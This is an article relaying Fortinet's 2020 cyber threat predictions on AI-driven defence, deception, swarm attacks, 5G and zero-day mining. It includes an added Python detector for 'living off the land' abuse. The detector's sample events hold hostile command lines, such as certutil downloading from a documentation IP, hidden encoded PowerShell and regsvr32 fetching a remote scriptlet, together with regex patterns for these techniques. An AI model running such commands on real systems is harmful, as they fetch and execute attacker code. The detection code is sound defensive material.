Fortinet, the automated cyber security solutions business, has unveiled predictions from the FortiGuard Labs team about the threat landscape for 2020 and beyond. These predictions reveal methods that Fortinet anticipates cyber criminals will employ in the near future, along with important strategies that will help organisations to protect against these oncoming attacks.
Cyber attack methodologies have become more sophisticated in recent years, in turn magnifying their effectiveness and speed. This trend looks likely to continue unless more organisations shift how they think about their security strategies. Given the volume, velocity and sophistication of today's global threat landscape, organisations must be able to respond in real time and at machine speed to effectively counter aggressive attacks. Advances in Artificial Intelligence (AI) and threat intelligence will be vital in this fight.
One of the objectives of developing security-focused AI over time has been to create an adaptive immune system for the network similar to the one in the human body. The first generation of AI was designed to use machine learning models to learn, correlate and then determine a specific course of action. The second generation of AI leverages its increasingly sophisticated ability to detect patterns to significantly enhance elements like access control by distributing learning nodes across an environment.
The third generation of AI is where, rather than relying on a central, monolithic processing centre, AI will interconnect its regional learner nodes such that locally collected data can be shared, correlated and analysed in a more distributed manner. This will be a very important development as organisations look to secure their expanding edge environments.
Federated machine learning
In addition to leveraging traditional forms of threat intelligence pulled from feeds or derived from internal traffic and data analysis, machine learning will eventually rely on a flood of relevant information coming from new edge devices to local learning nodes.
By tracking and correlating this real-time information, an AI system will not only be able to generate a more complete view of the threat landscape, but also refine how local systems respond to local events. AI systems will be able to see, correlate, track and prepare for threats by sharing information across the network. Eventually, a federated learning system will allow data sets to be interconnected so that learning models can adapt to changing environments and event trends, and so that an event observed at one point improves the intelligence of the entire system.
Investing in AI not only allows organisations to automate tasks, but can also enable an automated system that looks for and discovers attacks not just after the fact but before they occur. Combining machine learning with statistical analysis will allow organisations to develop customised action planning tied to AI to enhance threat detection and response. These threat playbooks could uncover underlying patterns that enable the AI system to predict an attacker's next move, forecast where the next attack is likely to occur and even determine which threat actors are the most likely culprits.
If this information is then added into an AI learning system, remote learning nodes will be able to provide advanced and proactive protection wherein they not only detect a threat, but also forecast movements, proactively intervene and coordinate with other nodes to simultaneously shut down all avenues of attack.
Opportunity in counter-intelligence and deception
One of the most critical resources in the world of espionage is counter-intelligence, and the same is true when attacking or defending an environment where moves are being carefully monitored. Defenders have a distinct advantage: access to the sorts of threat intelligence that cyber criminals generally lack, which can be augmented with machine learning and AI.
The increased use of deception technologies could spark a counter-intelligence response from cyber adversaries. In this case, attackers will need to learn to differentiate between legitimate and deceptive traffic without being caught merely for observing traffic patterns. Organisations will be able to counter this strategy effectively by adding playbooks and more pervasive AI to their deception strategies. This will not only detect criminals attempting to identify legitimate traffic, but also improve the deceptive traffic until it becomes practically impossible to distinguish from legitimate transactions.
Eventually, organisations could respond to any counter-intelligence efforts before they happen, enabling them to maintain a position of superior control.
Cyber security has unique requirements related to things like privacy and access, while cyber crime has no borders. As a result, law enforcement organisations are not only establishing global Command Centres, but have also begun connecting them to the private sector so they’re one step closer to seeing and responding to cyber criminals in real-time. A fabric of law enforcement as well as public and private sector relationships can help in terms of identifying and responding to cyber criminals. Initiatives that foster a more unified approach to bridge the gaps between different international and local law enforcement agencies, Governments, businesses and security experts will help expedite the timely and secure exchange of information to protect critical infrastructure against cyber crime.
Cyber adversary sophistication “not slowing down”
Changes in defensive strategy will not go unanswered by cyber adversaries. Where networks and organisations use sophisticated methods to detect and respond to attacks, criminals may respond with something even more capable. Combined with more sophisticated attack methods, an expanding potential attack surface and more intelligent AI-enabled systems, cyber criminals' sophistication is not decreasing.
A recent Fortinet Threat Landscape Report demonstrates a rise in the use of advanced evasion techniques designed to prevent detection, disable security functions and devices, and operate under the radar using 'living off the land' strategies: abusing software already installed on the target (signed system utilities, scripting hosts and administration tools) and disguising malicious traffic as legitimate. Many modern malware tools already incorporate features for evading anti-virus or other threat detection measures, but cyber adversaries are becoming more sophisticated in their obfuscation and anti-analysis practices. Such strategies exploit weaknesses in security resources and staffing.
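The passage above describes the problem in general terms, so here is an added example of what a detection engineer might build against it. It is not Fortinet's code or a rule from the report; it runs a handful of well-known 'living off the land' patterns (certutil used as a downloader, encoded or hidden PowerShell, regsvr32 and mshta pulling remote scriptlets, an Office application spawning a shell) over constructed process-creation events. The event lines, the field names and the rule set are illustrative assumptions; a production rule set would be far larger and tuned against the environment's own baseline.

```python
"""Flag 'living off the land' (LOLBin) activity in process-creation events.

Added example, not code from Fortinet or its Threat Landscape Report.
The events below are constructed for the demonstration and the rule set is a
small illustrative subset of widely documented LOLBin abuse patterns.
"""
import re
from dataclasses import dataclass

# Constructed sample events (not real logs): parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\WINWORD.EXE" /n report.docx'},
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/x.dat C:\Users\Public\x.dat"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"svchost.exe -k netsvcs"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/s.sct scrobj.dll"},
    # Legitimate administrative use of the same signed binary; must NOT be flagged.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tools\agent.exe SHA256"},
]

# (rule name, binary that must appear in the command line, abuse pattern in the command line)
LOLBIN_RULES = [
    ("certutil download", r"\bcertutil\b", r"-urlcache\b|\bhttps?://"),
    ("powershell encoded or hidden", r"\b(powershell|pwsh)\b",
     r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden"),
    ("regsvr32 remote scriptlet", r"\bregsvr32\b", r"/i:https?://|scrobj\.dll"),
    ("mshta remote content", r"\bmshta\b", r"https?://|javascript:|vbscript:"),
    ("rundll32 script execution", r"\brundll32\b", r"javascript:|https?://"),
]

# Parent/child pairing: an Office application should not be launching a shell or script host.
OFFICE_APPS = re.compile(r"(winword|excel|powerpnt|outlook)\.exe$", re.I)
SHELLS = re.compile(r"(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe$", re.I)


@dataclass
class Finding:
    index: int      # position of the event in the input list
    rule: str       # which rule fired
    cmdline: str    # the offending command line, for the analyst


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Run every rule over every event and return the list of findings."""
    findings = []
    for i, ev in enumerate(events):
        cmd = ev["cmdline"]
        # Command-line based rules: the binary must be present AND used in an abusive way,
        # so ordinary administrative use of the same tool does not fire.
        for name, binary, pattern in LOLBIN_RULES:
            if re.search(binary, cmd, re.I) and re.search(pattern, cmd, re.I):
                findings.append(Finding(i, name, cmd))
        # Process-lineage rule, independent of the command line.
        if OFFICE_APPS.search(basename(ev["parent"])) and SHELLS.search(basename(ev["image"])):
            findings.append(Finding(i, "office app spawned shell or script host", cmd))
    return findings


def flagged_indices(events):
    """Sorted list of event positions that triggered at least one rule."""
    return sorted({f.index for f in analyse(events)})


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.rule}: {f.cmdline}")
```

Two points matter more than the specific patterns. Each rule pairs the binary with how it is being used, which is what keeps the final `certutil -hashfile` event quiet while the `-urlcache ... http://` download fires; a rule on the binary name alone would drown analysts in legitimate activity. And the lineage rule fires on the Office-to-cmd.exe hop regardless of what the command line looks like, so an attacker who obfuscates the arguments still trips it.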
Over the past few years, the rise of swarm technology (which can leverage things like machine learning and AI to attack networks and devices) has shown new potential. Advances in swarm technology have powerful implications in the fields of medicine, transportation, engineering and automated problem solving. However, if used maliciously, it may also be a game-changer for adversaries if organisations don’t update their security strategies. When used by cyber criminals, bot swarms could be employed to infiltrate a network, overwhelm internal defences and efficiently find and extract data. Eventually, specialist bots, armed with specific functions, will be able to share and correlate intelligence gathered in real-time to accelerate a swarm’s ability to select and modify attacks to compromise a target (or even multiple targets simultaneously).
The advent of 5G may end up being the initial catalyst for the development of functional swarm-based attacks. This could be enabled by the ability to create local ad hoc networks that can quickly share and process information and applications. By weaponising 5G and edge computing, individually exploited devices could become a conduit for malicious code, while groups of compromised devices could work in concert to target victims at 5G speeds. Given the speed, intelligence and localised nature of such an attack, legacy security technologies could be challenged to effectively fight off such a persistent strategy.
Traditionally, finding and developing an exploit for a zero-day vulnerability was expensive, so criminals typically hoard them until their existing portfolio of attacks is neutralised. With the attack surface expanding and discovery becoming easier, an increase in the volume of potentially exploitable zero-day vulnerabilities is on the horizon.
AI fuzzing and zero-day mining have the ability to exponentially increase the volume of zero-day attacks as well. Security measures will need to be in place to counter this trend.